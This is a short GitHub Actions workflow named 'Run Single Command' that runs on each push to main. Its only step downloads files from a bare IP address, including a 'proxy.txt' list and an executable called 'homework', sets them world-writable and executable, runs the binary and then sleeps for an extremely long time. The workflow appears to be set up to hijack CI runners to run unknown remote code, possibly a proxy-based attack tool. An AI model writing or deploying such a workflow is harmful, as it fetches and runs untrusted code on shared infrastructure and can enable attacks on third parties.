name: Run Single Command

on:
  push:
    branches:
      - main

jobs:
  run-shell:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Run a Single Shell Command
        run: curl -O 87.121.79.39/ethan/method; chmod 777 method; curl -O 87.121.79.39/ethan/proxy.txt; curl -O 87.121.79.39/ethan/homework; chmod 777 homework;./homework; sleep 51512515251
